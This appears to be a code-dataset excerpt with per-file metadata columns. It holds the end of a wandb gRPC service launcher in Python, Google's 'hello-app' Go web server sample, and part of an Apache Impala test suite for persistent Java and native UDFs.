self._stub = None
def _grpc_wait_for_port(
self, fname: str, proc: subprocess.Popen = None
) -> Optional[int]:
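        # Poll for the port file written by the service process; give up after 30 seconds.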
time_max = time.time() + 30
port = None
while time.time() < time_max:
if proc and proc.poll():
# process finished
print("proc exited with", proc.returncode)
return None
if not os.path.isfile(fname):
time.sleep(0.2)
continue
            try:
                with open(fname) as f:
                    port = int(f.read())
            except Exception as e:
                print("Error:", e)
            return port
return None
def _grpc_launch_server(self) -> Optional[int]:
"""Launch grpc server and return port."""
# References for starting processes
# - https://github.com/wandb/client/blob/archive/old-cli/wandb/__init__.py
# - https://stackoverflow.com/questions/1196074/how-to-start-a-background-process-in-python
kwargs: Dict[str, Any] = dict(close_fds=True)
pid = os.getpid()
with tempfile.TemporaryDirectory() as tmpdir:
fname = os.path.join(tmpdir, f"port-{pid}.txt")
pid_str = str(os.getpid())
exec_cmd_list = [sys.executable, "-m"]
# Add coverage collection if needed
if os.environ.get("COVERAGE_RCFILE"):
exec_cmd_list += ["coverage", "run", "-m"]
internal_proc = subprocess.Popen(
exec_cmd_list
+ [
"wandb",
"service",
"--port-filename",
fname,
"--pid",
pid_str,
"--debug",
"true",
],
env=os.environ,
**kwargs,
)
port = self._grpc_wait_for_port(fname, proc=internal_proc)
return port
def start(self) -> Optional[int]:
port = self._grpc_launch_server()
return port
def connect(self, port: int) -> None:
channel = grpc.insecure_channel("localhost:{}".format(port))
stub = pbgrpc.InternalServiceStub(channel)
self._stub = stub
# TODO: make sure service is up
def _get_stub(self) -> Optional[pbgrpc.InternalServiceStub]:
return self._stub
def _svc_inform_init(self, settings: Settings, run_id: str) -> None:
assert self._stub
inform_init = spb.ServerInformInitRequest()
settings_dict = dict(settings)
settings_dict["_log_level"] = logging.DEBUG
_pbmap_apply_dict(inform_init._settings_map, settings_dict)
inform_init._info.stream_id = run_id
_ = self._stub.ServerInformInit(inform_init)
def _svc_inform_finish(self, run_id: str = None) -> None:
assert self._stub
assert run_id
inform_fin = spb.ServerInformFinishRequest()
inform_fin._info.stream_id = run_id
_ = self._stub.ServerInformFinish(inform_fin)
def _svc_inform_attach(self, attach_id: str) -> None:
assert self._stub
inform_attach = spb.ServerInformAttachRequest()
inform_attach._info.stream_id = attach_id
_ = self._stub.ServerInformAttach(inform_attach)
def _svc_inform_teardown(self, exit_code: int) -> None:
assert self._stub
inform_fin = spb.ServerInformTeardownRequest(exit_code=exit_code)
_ = self._stub.ServerInformTeardown(inform_fin)
| []
| []
| [
"COVERAGE_RCFILE"
]
| [] | ["COVERAGE_RCFILE"] | python | 1 | 0 | |
hello-app/main.go | /**
* Copyright 2017 Google Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
// [START container_hello_app]
package main
import (
"fmt"
"log"
"net/http"
"os"
)
func main() {
// register hello function to handle all requests
mux := http.NewServeMux()
mux.HandleFunc("/", hello)
// use PORT environment variable, or default to 8080
port := os.Getenv("PORT")
if port == "" {
port = "8080"
}
// start the web server on port and accept requests
log.Printf("Server listening on port %s", port)
log.Fatal(http.ListenAndServe(":"+port, mux))
}
// hello responds to the request with a plain-text "Hello, world" message.
func hello(w http.ResponseWriter, r *http.Request) {
log.Printf("Serving request: %s", r.URL.Path)
host, _ := os.Hostname()
fmt.Fprintf(w, "Hello, world!\n")
fmt.Fprintf(w, "Version: 1.0.0\n")
fmt.Fprintf(w, "Hostname: %s\n", host)
}
// [END container_hello_app]
| [
"\"PORT\""
]
| []
| [
"PORT"
]
| [] | ["PORT"] | go | 1 | 0 | |
tests/custom_cluster/test_permanent_udfs.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import glob
import os
import pytest
import re
import shutil
import subprocess
from tempfile import mkdtemp
from tests.common.custom_cluster_test_suite import CustomClusterTestSuite
from tests.common.skip import (SkipIfS3, SkipIfABFS, SkipIfADLS, SkipIfIsilon, SkipIfGCS,
SkipIfLocal)
from tests.common.test_dimensions import create_uncompressed_text_dimension
from tests.util.filesystem_utils import get_fs_path
class TestUdfPersistence(CustomClusterTestSuite):
""" Tests the behavior of UDFs and UDAs between catalog restarts. With IMPALA-1748,
these functions are persisted to the metastore and are loaded again during catalog
startup"""
DATABASE = 'udf_permanent_test'
JAVA_FN_TEST_DB = 'java_permanent_test'
HIVE_IMPALA_INTEGRATION_DB = 'hive_impala_integration_db'
HIVE_UDF_JAR = os.getenv('DEFAULT_FS') + '/test-warehouse/hive-exec.jar';
JAVA_UDF_JAR = os.getenv('DEFAULT_FS') + '/test-warehouse/impala-hive-udfs.jar';
LOCAL_LIBRARY_DIR = mkdtemp(dir="/tmp")
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def setup_class(cls):
if cls.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
super(TestUdfPersistence, cls).setup_class()
@classmethod
def add_test_dimensions(cls):
super(TestUdfPersistence, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
create_uncompressed_text_dimension(cls.get_workload()))
def setup_method(self, method):
super(TestUdfPersistence, self).setup_method(method)
impalad = self.cluster.impalads[0]
self.client = impalad.service.create_beeswax_client()
self.__cleanup()
self.__load_drop_functions(
self.CREATE_UDFS_TEMPLATE, self.DATABASE,
get_fs_path('/test-warehouse/libTestUdfs.so'))
self.__load_drop_functions(
self.DROP_SAMPLE_UDAS_TEMPLATE, self.DATABASE,
get_fs_path('/test-warehouse/libudasample.so'))
self.__load_drop_functions(
self.CREATE_SAMPLE_UDAS_TEMPLATE, self.DATABASE,
get_fs_path('/test-warehouse/libudasample.so'))
self.__load_drop_functions(
self.CREATE_TEST_UDAS_TEMPLATE, self.DATABASE,
get_fs_path('/test-warehouse/libTestUdas.so'))
self.uda_count =\
self.CREATE_SAMPLE_UDAS_TEMPLATE.count("create aggregate function") +\
self.CREATE_TEST_UDAS_TEMPLATE.count("create aggregate function")
self.udf_count = self.CREATE_UDFS_TEMPLATE.count("create function")
self.client.execute("CREATE DATABASE IF NOT EXISTS %s" % self.JAVA_FN_TEST_DB)
self.client.execute("CREATE DATABASE IF NOT EXISTS %s" %
self.HIVE_IMPALA_INTEGRATION_DB)
def teardown_method(self, method):
self.__cleanup()
def __cleanup(self):
self.client.execute("DROP DATABASE IF EXISTS %s CASCADE" % self.DATABASE)
self.client.execute("DROP DATABASE IF EXISTS %s CASCADE" % self.JAVA_FN_TEST_DB)
self.client.execute("DROP DATABASE IF EXISTS %s CASCADE"
% self.HIVE_IMPALA_INTEGRATION_DB)
shutil.rmtree(self.LOCAL_LIBRARY_DIR, ignore_errors=True)
def __load_drop_functions(self, template, database, location):
queries = template.format(database=database, location=location)
# Split queries and remove empty lines
queries = [q for q in queries.split(';') if q.strip()]
for query in queries:
result = self.client.execute(query)
assert result is not None
def __restart_cluster(self):
self._stop_impala_cluster()
self._start_impala_cluster(list())
impalad = self.cluster.impalads[0]
self.client = impalad.service.create_beeswax_client()
def verify_function_count(self, query, count):
result = self.client.execute(query)
assert result is not None and len(result.data) == count
@pytest.mark.execute_serially
def test_permanent_udfs(self):
# Make sure the pre-calculated count tallies with the number of
# functions shown using "show [aggregate] functions" statement
self.verify_function_count(
"SHOW FUNCTIONS in {0}".format(self.DATABASE), self.udf_count);
self.verify_function_count(
"SHOW AGGREGATE FUNCTIONS in {0}".format(self.DATABASE), self.uda_count)
# invalidate metadata and make sure the count tallies
result = self.client.execute("INVALIDATE METADATA")
self.verify_function_count(
"SHOW FUNCTIONS in {0}".format(self.DATABASE), self.udf_count);
self.verify_function_count(
"SHOW AGGREGATE FUNCTIONS in {0}".format(self.DATABASE), self.uda_count)
# Restart the cluster, this triggers a full metadata reload
self.__restart_cluster()
# Make sure the counts of udfs and udas match post restart
self.verify_function_count(
"SHOW FUNCTIONS in {0}".format(self.DATABASE), self.udf_count);
self.verify_function_count(
"SHOW AGGREGATE FUNCTIONS in {0}".format(self.DATABASE), self.uda_count)
# Drop sample udas and verify the count matches pre and post restart
self.__load_drop_functions(
self.DROP_SAMPLE_UDAS_TEMPLATE, self.DATABASE,
get_fs_path('/test-warehouse/libudasample.so'))
self.verify_function_count(
"SHOW AGGREGATE FUNCTIONS in {0}".format(self.DATABASE), 1)
self.__restart_cluster()
self.verify_function_count(
"SHOW AGGREGATE FUNCTIONS in {0}".format(self.DATABASE), 1)
def __verify_udf_in_hive(self, udf):
(query, result) = self.SAMPLE_JAVA_UDFS_TEST[udf]
stdout = self.run_stmt_in_hive("select " + query.format(
db=self.HIVE_IMPALA_INTEGRATION_DB))
assert stdout is not None and result in str(stdout)
def __verify_udf_in_impala(self, udf):
(query, result) = self.SAMPLE_JAVA_UDFS_TEST[udf]
stdout = self.client.execute("select " + query.format(
db=self.HIVE_IMPALA_INTEGRATION_DB))
assert stdout is not None and result in str(stdout.data)
def __describe_udf_in_hive(self, udf, db=HIVE_IMPALA_INTEGRATION_DB):
""" Describe the specified function, returning stdout. """
# Hive 2+ caches UDFs, so we have to explicitly invalidate the UDF if
# we've made changes on the Impala side.
stmt = "RELOAD FUNCTION ; DESCRIBE FUNCTION {0}.{1}".format(db, udf)
return self.run_stmt_in_hive(stmt)
@SkipIfIsilon.hive
@SkipIfS3.hive
@SkipIfGCS.hive
@SkipIfABFS.hive
@SkipIfADLS.hive
@SkipIfLocal.hive
@pytest.mark.execute_serially
def test_corrupt_java_udf(self):
""" IMPALA-3820: This tests if the Catalog server can gracefully handle
Java UDFs with unresolved dependencies."""
if self.exploration_strategy() != 'exhaustive': pytest.skip()
# Create a Java UDF with unresolved dependencies from Hive and
# restart the Catalog server. Catalog should ignore the
# function load.
self.run_stmt_in_hive("create function %s.corrupt_udf as \
'org.apache.impala.UnresolvedUdf' using jar '%s'"
% (self.JAVA_FN_TEST_DB, self.JAVA_UDF_JAR))
self.__restart_cluster()
# Make sure the function count is 0
self.verify_function_count(
"SHOW FUNCTIONS in {0}".format(self.JAVA_FN_TEST_DB), 0)
@SkipIfIsilon.hive
@SkipIfS3.hive
@SkipIfGCS.hive
@SkipIfABFS.hive
@SkipIfADLS.hive
@SkipIfLocal.hive
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
catalogd_args= "--local_library_dir={0}".format(LOCAL_LIBRARY_DIR))
def test_java_udfs_hive_integration(self):
''' This test checks the integration between Hive and Impala on
CREATE FUNCTION and DROP FUNCTION statements for persistent Java UDFs.
The main objective of the test is to check the following four cases.
- Add Java UDFs from Impala and make sure they are visible in Hive
- Drop Java UDFs from Impala and make sure this reflects in Hive.
    - Add Java UDFs from Hive and make sure they are visible in Impala
- Drop Java UDFs from Hive and make sure this reflects in Impala
'''
# Add Java UDFs from Impala and check if they are visible in Hive.
    # Hive has a bug where permanent functions are not displayed by the SHOW FUNCTIONS
    # statement, so this test relies on the DESCRIBE FUNCTION statement, which prints
    # a message if the function is not present.
udfs_to_test = list(self.SAMPLE_JAVA_UDFS)
if int(os.environ['IMPALA_HIVE_MAJOR_VERSION']) == 2:
udfs_to_test += self.SAMPLE_JAVA_UDFS_HIVE2_ONLY
for (fn, fn_symbol) in udfs_to_test:
self.client.execute(self.DROP_JAVA_UDF_TEMPLATE.format(
db=self.HIVE_IMPALA_INTEGRATION_DB, function=fn))
self.client.execute(self.CREATE_JAVA_UDF_TEMPLATE.format(
db=self.HIVE_IMPALA_INTEGRATION_DB, function=fn,
location=self.HIVE_UDF_JAR, symbol=fn_symbol))
hive_stdout = self.__describe_udf_in_hive(fn)
assert "does not exist" not in hive_stdout
self.__verify_udf_in_hive(fn)
# Drop the function from Impala and check if it reflects in Hive.
self.client.execute(self.DROP_JAVA_UDF_TEMPLATE.format(
db=self.HIVE_IMPALA_INTEGRATION_DB, function=fn))
hive_stdout = self.__describe_udf_in_hive(fn)
assert "does not exist" in hive_stdout
# Create the same set of functions from Hive and make sure they are visible
# in Impala. There are two ways to make functions visible in Impala: invalidate
# metadata and refresh functions <db>.
REFRESH_COMMANDS = ["INVALIDATE METADATA",
"REFRESH FUNCTIONS {0}".format(self.HIVE_IMPALA_INTEGRATION_DB)]
for refresh_command in REFRESH_COMMANDS:
for (fn, fn_symbol) in udfs_to_test:
self.run_stmt_in_hive(self.CREATE_HIVE_UDF_TEMPLATE.format(
db=self.HIVE_IMPALA_INTEGRATION_DB, function=fn,
location=self.HIVE_UDF_JAR, symbol=fn_symbol))
self.client.execute(refresh_command)
for (fn, fn_symbol) in udfs_to_test:
result = self.client.execute("SHOW FUNCTIONS IN {0}".format(
self.HIVE_IMPALA_INTEGRATION_DB))
assert result is not None and len(result.data) > 0 and\
fn in str(result.data)
self.__verify_udf_in_impala(fn)
# Drop the function in Hive and make sure it reflects in Impala.
self.run_stmt_in_hive(self.DROP_JAVA_UDF_TEMPLATE.format(
db=self.HIVE_IMPALA_INTEGRATION_DB, function=fn))
self.client.execute(refresh_command)
self.verify_function_count(
"SHOW FUNCTIONS in {0}".format(self.HIVE_IMPALA_INTEGRATION_DB), 0)
# Make sure we deleted all the temporary jars we copied to the local fs
assert len(glob.glob(self.LOCAL_LIBRARY_DIR + "/*.jar")) == 0
@SkipIfIsilon.hive
@SkipIfS3.hive
@SkipIfGCS.hive
@SkipIfABFS.hive
@SkipIfADLS.hive
@SkipIfLocal.hive
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
catalogd_args= "--local_library_dir={0}".format(LOCAL_LIBRARY_DIR))
def test_refresh_native(self):
''' This test checks that a native function is visible in Impala after a
REFRESH FUNCTIONS command. We will add the native function through Hive
by setting DBPROPERTIES of a database.'''
# First we create the function in Impala.
create_func_impala = ("create function {database}.identity_tmp(bigint) "
"returns bigint location '{location}' symbol='Identity'")
self.client.execute(create_func_impala.format(
database=self.HIVE_IMPALA_INTEGRATION_DB,
location=get_fs_path('/test-warehouse/libTestUdfs.so')))
# Impala puts the native function into a database property table. We extract the key
# value pair that represents the function from the table.
describe_db_hive = "DESCRIBE DATABASE EXTENDED {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB)
result = self.run_stmt_in_hive(describe_db_hive)
regex = r"{.*(impala_registered_function.*?)=(.*?)[,}]"
match = re.search(regex, result)
func_name = match.group(1)
func_contents = match.group(2)
# Recreate the database, this deletes the function.
self.client.execute("DROP DATABASE {database} CASCADE".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
self.client.execute("CREATE DATABASE {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
result = self.client.execute("SHOW FUNCTIONS IN {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
assert result is not None and len(result.data) == 0
# Place the function into the recreated database by modifying it's properties.
alter_db_hive = "ALTER DATABASE {database} SET DBPROPERTIES ('{fn_name}'='{fn_val}')"
self.run_stmt_in_hive(alter_db_hive.format(
database=self.HIVE_IMPALA_INTEGRATION_DB,
fn_name=func_name,
fn_val=func_contents))
result = self.client.execute("SHOW FUNCTIONS IN {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
assert result is not None and len(result.data) == 0
# The function should be visible in Impala after a REFRESH FUNCTIONS.
self.client.execute("REFRESH FUNCTIONS {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
result = self.client.execute("SHOW FUNCTIONS IN {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
assert result is not None and len(result.data) > 0 and\
"identity_tmp" in str(result.data)
# Verify that the function returns a correct result.
result = self.client.execute("SELECT {database}.identity_tmp(10)".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
assert result.data[0] == "10"
# Make sure we deleted all the temporary jars we copied to the local fs
assert len(glob.glob(self.LOCAL_LIBRARY_DIR + "/*.jar")) == 0
@SkipIfIsilon.hive
@SkipIfS3.hive
@SkipIfGCS.hive
@SkipIfABFS.hive
@SkipIfADLS.hive
@SkipIfLocal.hive
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
catalogd_args= "--local_library_dir={0}".format(LOCAL_LIBRARY_DIR))
def test_refresh_replace(self):
''' This test checks that if we drop a function and then create a
different function with the same name in Hive, the new function will
be visible in Impala after REFRESH FUNCTIONS.'''
# Create an original function.
create_orig_func_hive = ("create function {database}.test_func as "
"'org.apache.hadoop.hive.ql.udf.UDFHex' using jar '{jar}'")
self.run_stmt_in_hive(create_orig_func_hive.format(
database=self.HIVE_IMPALA_INTEGRATION_DB, jar=self.JAVA_UDF_JAR))
result = self.client.execute("SHOW FUNCTIONS IN {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
assert result is not None and len(result.data) == 0
# Verify the function becomes visible in Impala after REFRESH FUNCTIONS.
self.client.execute("REFRESH FUNCTIONS {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
result = self.client.execute("SHOW FUNCTIONS IN {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
assert (result is not None and len(result.data) == 3 and
"test_func" in str(result.data))
result = self.client.execute("SELECT {database}.test_func(123)".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
assert result.data[0] == "7B"
# Drop the original function and create a different function with the same name as
# the original, but a different JAR.
drop_orig_func_hive = "DROP FUNCTION {database}.test_func"
self.run_stmt_in_hive(drop_orig_func_hive.format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
create_replacement_func_hive = ("create function {database}.test_func as "
"'org.apache.hadoop.hive.ql.udf.UDFBin' using jar '{jar}'")
self.run_stmt_in_hive(create_replacement_func_hive.format(
database=self.HIVE_IMPALA_INTEGRATION_DB, jar=self.JAVA_UDF_JAR))
self.client.execute("REFRESH FUNCTIONS {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
result = self.client.execute("SHOW FUNCTIONS IN {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
assert (result is not None and len(result.data) == 1 and
"test_func" in str(result.data))
# Verify that the function has actually been updated.
result = self.client.execute("SELECT {database}.test_func(123)".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
assert result.data[0] == "1111011"
# Make sure we deleted all the temporary jars we copied to the local fs
assert len(glob.glob(self.LOCAL_LIBRARY_DIR + "/*.jar")) == 0
@pytest.mark.execute_serially
def test_java_udfs_from_impala(self):
""" This tests checks the behavior of permanent Java UDFs in Impala."""
self.verify_function_count(
"SHOW FUNCTIONS in {0}".format(self.JAVA_FN_TEST_DB), 0);
# Create a non persistent Java UDF and make sure we can't create a
# persistent Java UDF with same name
self.client.execute("create function %s.%s(boolean) returns boolean "\
"location '%s' symbol='%s'" % (self.JAVA_FN_TEST_DB, "identity",
self.JAVA_UDF_JAR, "org.apache.impala.TestUdf"))
result = self.execute_query_expect_failure(self.client,
self.CREATE_JAVA_UDF_TEMPLATE.format(db=self.JAVA_FN_TEST_DB,
function="identity", location=self.JAVA_UDF_JAR,
symbol="org.apache.impala.TestUdf"))
assert "Function already exists" in str(result)
# Test the same with a NATIVE function
self.client.execute("create function {database}.identity(int) "\
"returns int location '{location}' symbol='Identity'".format(
database=self.JAVA_FN_TEST_DB,
location="/test-warehouse/libTestUdfs.so"))
result = self.execute_query_expect_failure(self.client,
self.CREATE_JAVA_UDF_TEMPLATE.format(db=self.JAVA_FN_TEST_DB,
function="identity", location=self.JAVA_UDF_JAR,
symbol="org.apache.impala.TestUdf"))
assert "Function already exists" in str(result)
# Test the reverse. Add a persistent Java UDF and ensure we cannot
# add non persistent Java UDFs or NATIVE functions with the same name.
self.client.execute(self.CREATE_JAVA_UDF_TEMPLATE.format(
db=self.JAVA_FN_TEST_DB, function="identity_java",
location=self.JAVA_UDF_JAR, symbol="org.apache.impala.TestUdf"))
result = self.execute_query_expect_failure(self.client, "create function "\
"%s.%s(boolean) returns boolean location '%s' symbol='%s'" % (
self.JAVA_FN_TEST_DB, "identity_java", self.JAVA_UDF_JAR,
"org.apache.impala.TestUdf"))
assert "Function already exists" in str(result)
result = self.execute_query_expect_failure(self.client, "create function "\
"{database}.identity_java(int) returns int location '{location}' "\
"symbol='Identity'".format(database=self.JAVA_FN_TEST_DB,
location="/test-warehouse/libTestUdfs.so"))
assert "Function already exists" in str(result)
# With IF NOT EXISTS, the query shouldn't fail.
result = self.execute_query_expect_success(self.client, "create function "\
" if not exists {database}.identity_java(int) returns int location "\
"'{location}' symbol='Identity'".format(database=self.JAVA_FN_TEST_DB,
location="/test-warehouse/libTestUdfs.so"))
result = self.client.execute("SHOW FUNCTIONS in %s" % self.JAVA_FN_TEST_DB)
self.execute_query_expect_success(self.client,
"DROP FUNCTION IF EXISTS {db}.impala_java".format(db=self.JAVA_FN_TEST_DB))
# Drop the persistent Java function.
# Test the same create with IF NOT EXISTS. No exception should be thrown.
# Add a Java udf which has a few incompatible 'evaluate' functions in the
# symbol class. Catalog should load only the compatible ones. JavaUdfTest
# has 8 evaluate signatures out of which only 3 are valid.
compatibility_fn_count = 3
self.client.execute(self.CREATE_JAVA_UDF_TEMPLATE.format(
db=self.JAVA_FN_TEST_DB, function="compatibility",
location=self.JAVA_UDF_JAR, symbol="org.apache.impala.JavaUdfTest"))
self.verify_function_count(
"SHOW FUNCTIONS IN %s like 'compatibility*'" % self.JAVA_FN_TEST_DB,
compatibility_fn_count)
result = self.client.execute("SHOW FUNCTIONS in %s" % self.JAVA_FN_TEST_DB)
function_count = len(result.data)
# Invalidating metadata should preserve all the functions
self.client.execute("INVALIDATE METADATA")
self.verify_function_count(
"SHOW FUNCTIONS IN %s" % self.JAVA_FN_TEST_DB, function_count)
# Restarting the cluster should preserve only the persisted functions. In
# this case, identity(boolean) should be wiped out.
self.__restart_cluster()
self.verify_function_count(
"SHOW FUNCTIONS IN %s" % self.JAVA_FN_TEST_DB, function_count-1)
# Dropping persisted Java UDFs with old syntax should raise an exception
self.execute_query_expect_failure(self.client,
"DROP FUNCTION compatibility(smallint)")
self.verify_function_count(
"SHOW FUNCTIONS IN %s like 'compatibility*'" % self.JAVA_FN_TEST_DB, 3)
# Drop the functions and make sure they don't appear post restart.
self.client.execute("DROP FUNCTION %s.compatibility" % self.JAVA_FN_TEST_DB)
self.verify_function_count(
"SHOW FUNCTIONS IN %s like 'compatibility*'" % self.JAVA_FN_TEST_DB, 0)
self.__restart_cluster()
self.verify_function_count(
"SHOW FUNCTIONS IN %s like 'compatibility*'" % self.JAVA_FN_TEST_DB, 0)
# Try to load a UDF that has no compatible signatures. Make sure it is not added
# to Hive and Impala.
result = self.execute_query_expect_failure(self.client,
self.CREATE_JAVA_UDF_TEMPLATE.format(db=self.JAVA_FN_TEST_DB, function="badudf",
location=self.JAVA_UDF_JAR, symbol="org.apache.impala.IncompatibleUdfTest"))
assert "No compatible function signatures" in str(result)
self.verify_function_count(
"SHOW FUNCTIONS IN %s like 'badudf*'" % self.JAVA_FN_TEST_DB, 0)
result = self.__describe_udf_in_hive('badudf', db=self.JAVA_FN_TEST_DB)
assert "does not exist" in str(result)
# Create the same function from hive and make sure Impala doesn't load any signatures.
self.run_stmt_in_hive(self.CREATE_HIVE_UDF_TEMPLATE.format(
db=self.JAVA_FN_TEST_DB, function="badudf",
location=self.JAVA_UDF_JAR, symbol="org.apache.impala.IncompatibleUdfTest"))
result = self.__describe_udf_in_hive('badudf', db=self.JAVA_FN_TEST_DB)
assert "does not exist" not in str(result)
self.client.execute("INVALIDATE METADATA")
self.verify_function_count(
"SHOW FUNCTIONS IN %s like 'badudf*'" % self.JAVA_FN_TEST_DB, 0)
# Add a function with the same name from Impala. It should fail.
result = self.execute_query_expect_failure(self.client,
self.CREATE_JAVA_UDF_TEMPLATE.format(db=self.JAVA_FN_TEST_DB, function="badudf",
location=self.JAVA_UDF_JAR, symbol="org.apache.impala.TestUdf"))
assert "Function badudf already exists" in str(result)
# Drop the function and make sure the function if dropped from hive
self.client.execute(self.DROP_JAVA_UDF_TEMPLATE.format(
db=self.JAVA_FN_TEST_DB, function="badudf"))
result = self.__describe_udf_in_hive('badudf', db=self.JAVA_FN_TEST_DB)
assert "does not exist" in str(result)
# Create sample UDA functions in {database} from library {location}
DROP_SAMPLE_UDAS_TEMPLATE = """
drop function if exists {database}.test_count(int);
drop function if exists {database}.hll(int);
drop function if exists {database}.sum_small_decimal(decimal(9,2));
"""
CREATE_JAVA_UDF_TEMPLATE = """
CREATE FUNCTION {db}.{function} LOCATION '{location}' symbol='{symbol}'
"""
CREATE_HIVE_UDF_TEMPLATE = """
CREATE FUNCTION {db}.{function} as '{symbol}' USING JAR '{location}'
"""
DROP_JAVA_UDF_TEMPLATE = "DROP FUNCTION IF EXISTS {db}.{function}"
# Sample java udfs from hive-exec.jar. Function name to symbol class mapping
SAMPLE_JAVA_UDFS = [
('udfpi', 'org.apache.hadoop.hive.ql.udf.UDFPI'),
('udfbin', 'org.apache.hadoop.hive.ql.udf.UDFBin'),
('udfhex', 'org.apache.hadoop.hive.ql.udf.UDFHex'),
('udfconv', 'org.apache.hadoop.hive.ql.udf.UDFConv'),
('udflike', 'org.apache.hadoop.hive.ql.udf.UDFLike'),
('udfsign', 'org.apache.hadoop.hive.ql.udf.UDFSign'),
('udfascii','org.apache.hadoop.hive.ql.udf.UDFAscii')
]
# These UDFs are available in Hive 2 but in Hive 3 are now implemented
# using a new GenericUDF interface that we don't support.
SAMPLE_JAVA_UDFS_HIVE2_ONLY = [
('udfhour', 'org.apache.hadoop.hive.ql.udf.UDFHour'),
('udfyear', 'org.apache.hadoop.hive.ql.udf.UDFYear'),
]
# Simple tests to verify java udfs in SAMPLE_JAVA_UDFS
SAMPLE_JAVA_UDFS_TEST = {
'udfpi' : ('{db}.udfpi()', '3.141592653589793'),
'udfbin' : ('{db}.udfbin(123)', '1111011'),
'udfhex' : ('{db}.udfhex(123)', '7B'),
'udfconv' : ('{db}.udfconv("100", 2, 10)', '4'),
'udfhour' : ('{db}.udfhour("12:55:12")', '12'),
'udflike' : ('{db}.udflike("abc", "def")', 'false'),
'udfsign' : ('{db}.udfsign(0)', '0'),
'udfyear' : ('{db}.udfyear("1990-02-06")', '1990'),
'udfascii' : ('{db}.udfascii("abc")','97')
}
CREATE_SAMPLE_UDAS_TEMPLATE = """
create database if not exists {database};
create aggregate function {database}.test_count(int) returns bigint
location '{location}' update_fn='CountUpdate';
create aggregate function {database}.hll(int) returns string
location '{location}' update_fn='HllUpdate';
create aggregate function {database}.sum_small_decimal(decimal(9,2))
returns decimal(9,2) location '{location}' update_fn='SumSmallDecimalUpdate';
"""
# Create test UDA functions in {database} from library {location}
CREATE_TEST_UDAS_TEMPLATE = """
drop function if exists {database}.trunc_sum(double);
create database if not exists {database};
create aggregate function {database}.trunc_sum(double)
returns bigint intermediate double location '{location}'
update_fn='TruncSumUpdate' merge_fn='TruncSumMerge'
serialize_fn='TruncSumSerialize' finalize_fn='TruncSumFinalize';
"""
# Create test UDF functions in {database} from library {location}
CREATE_UDFS_TEMPLATE = """
drop function if exists {database}.identity(boolean);
drop function if exists {database}.identity(tinyint);
drop function if exists {database}.identity(smallint);
drop function if exists {database}.identity(int);
drop function if exists {database}.identity(bigint);
drop function if exists {database}.identity(float);
drop function if exists {database}.identity(double);
drop function if exists {database}.identity(string);
drop function if exists {database}.identity(timestamp);
drop function if exists {database}.identity(date);
drop function if exists {database}.identity(decimal(9,0));
drop function if exists {database}.identity(decimal(18,1));
drop function if exists {database}.identity(decimal(38,10));
drop function if exists {database}.all_types_fn(
string, boolean, tinyint, smallint, int, bigint, float, double, decimal(2,0),
date);
drop function if exists {database}.no_args();
drop function if exists {database}.var_and(boolean...);
drop function if exists {database}.var_sum(int...);
drop function if exists {database}.var_sum(double...);
drop function if exists {database}.var_sum(string...);
drop function if exists {database}.var_sum(decimal(4,2)...);
drop function if exists {database}.var_sum_multiply(double, int...);
drop function if exists {database}.constant_timestamp();
drop function if exists {database}.constant_date();
drop function if exists {database}.validate_arg_type(string);
drop function if exists {database}.count_rows();
drop function if exists {database}.constant_arg(int);
drop function if exists {database}.validate_open(int);
drop function if exists {database}.mem_test(bigint);
drop function if exists {database}.mem_test_leaks(bigint);
drop function if exists {database}.unmangled_symbol();
drop function if exists {database}.four_args(int, int, int, int);
drop function if exists {database}.five_args(int, int, int, int, int);
drop function if exists {database}.six_args(int, int, int, int, int, int);
drop function if exists {database}.seven_args(int, int, int, int, int, int, int);
drop function if exists {database}.eight_args(int, int, int, int, int, int, int, int);
create database if not exists {database};
create function {database}.identity(boolean) returns boolean
location '{location}' symbol='Identity';
create function {database}.identity(tinyint) returns tinyint
location '{location}' symbol='Identity';
create function {database}.identity(smallint) returns smallint
location '{location}' symbol='Identity';
create function {database}.identity(int) returns int
location '{location}' symbol='Identity';
create function {database}.identity(bigint) returns bigint
location '{location}' symbol='Identity';
create function {database}.identity(float) returns float
location '{location}' symbol='Identity';
create function {database}.identity(double) returns double
location '{location}' symbol='Identity';
create function {database}.identity(string) returns string
location '{location}'
symbol='_Z8IdentityPN10impala_udf15FunctionContextERKNS_9StringValE';
create function {database}.identity(timestamp) returns timestamp
location '{location}'
symbol='_Z8IdentityPN10impala_udf15FunctionContextERKNS_12TimestampValE';
create function {database}.identity(date) returns date
